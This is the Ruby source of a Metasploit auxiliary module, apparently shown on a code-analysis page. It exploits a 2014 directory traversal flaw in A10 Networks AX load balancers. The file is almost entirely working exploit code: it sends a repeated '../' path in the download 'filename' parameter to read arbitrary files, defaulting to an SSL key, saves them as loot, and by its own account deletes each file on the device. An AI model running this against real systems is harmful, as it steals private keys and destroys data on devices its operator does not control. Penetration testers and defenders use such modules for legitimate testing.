modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb from rapid7/metasploit-framework

modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb
Summary

Maintainability

3 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'A10 Networks AX Loadbalancer Directory Traversal',
      'Description'    => %q{
        This module exploits a directory traversal flaw found in A10 Networks
        (Soft) AX Loadbalancer version 2.6.1-GR1-P5/2.7.0 or less.  When
        handling a file download request, the xml/downloads class fails to
        properly check the 'filename' parameter, which can be abused to read
        any file outside the virtual directory. Important files include SSL
        certificates. This module works on both the hardware devices and the
        Virtual Machine appliances. IMPORTANT NOTE: This module will also delete the
        file on the device after downloading it. Because of this, the CONFIRM_DELETE
        option must be set to 'true' either manually or by script.
      },
      'References'     =>
        [
          ['OSVDB', '102657'],
          ['BID', '65206'],
          ['EDB', '31261']
        ],
      'Author'         =>
        [
          'xistence'  # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2014-01-28'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        OptString.new('FILE', [true, 'The file to obtain', '/a10data/key/mydomain.tld']),
        OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]),
        OptBool.new('CONFIRM_DELETE', [true, 'Run the module, even when it will delete files', false]),
      ])
  end

  def run
    unless datastore['CONFIRM_DELETE']
      print_error("This module will delete files on vulnerable systems. Please, set CONFIRM_DELETE in order to run it.")
      return
    end

    super
  end

  def run_host(ip)
    peer = "#{ip}:#{rport}"
    fname = datastore['FILE']

    print_status("Reading '#{datastore['FILE']}'")
    traverse = "../" * datastore['DEPTH']
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "xml", "downloads", ""),
      'vars_get' =>
        {
          'filename' => "/a10data/tmp/#{traverse}#{datastore['FILE']}"
        }
    })

    if res and res.code == 500 and res.body =~ /Error report/
      vprint_error("Cannot obtain '#{fname}', here are some possible reasons:")
      vprint_error("\t1. File does not exist.")
      vprint_error("\t2. The server does not have any patches deployed.")
      vprint_error("\t3. Your 'DEPTH' option isn't deep enough.")
      vprint_error("\t4. Some kind of permission issues.")
    elsif res and res.code == 200
      data = res.body
      p = store_loot(
        'a10networks.ax',
        'application/octet-stream',
        ip,
        data,
        fname
      )
      vprint_line(data)
      print_good("#{fname} stored as '#{p}'")
    elsif res and res.code == 404 and res.body.to_s =~ /The requested URL.*was not found/
      vprint_error("File not found. Check FILE.")
    else
      vprint_error("Fail to obtain file for some unknown reason")
    end
  end
end